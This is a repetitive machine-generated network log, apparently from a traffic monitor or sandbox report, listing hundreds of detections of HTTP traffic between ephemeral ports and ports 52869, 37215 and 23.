Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57732 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43672 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35342 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44238
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55986
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44272
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55994
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44284
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44298
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34636 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44306
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44382
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44408
Source: unknown	Network traffic detected: HTTP traffic on port 59242 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44422
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43982 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44446
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 44502
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48950 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35256 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51126 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40854 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43858 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35384 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55468
Source: unknown	Network traffic detected: HTTP traffic on port 55476 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53576 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 55476
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39174 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59048
Source: unknown	Network traffic detected: HTTP traffic on port 59060 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 59060
Source: unknown	Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41516 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60078 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60082 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44976 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48824 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48710 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42098 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37108 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 37108
Source: unknown	Network traffic detected: HTTP traffic on port 37110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 37110
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34414 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46058 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41378 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58452 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47268 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43218 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47226 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48016 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51476 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 51476
Source: unknown	Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42746 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51096 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51100 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42746
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42706
Source: unknown	Network traffic detected: HTTP traffic on port 50896 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45512 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35714 -> 52869
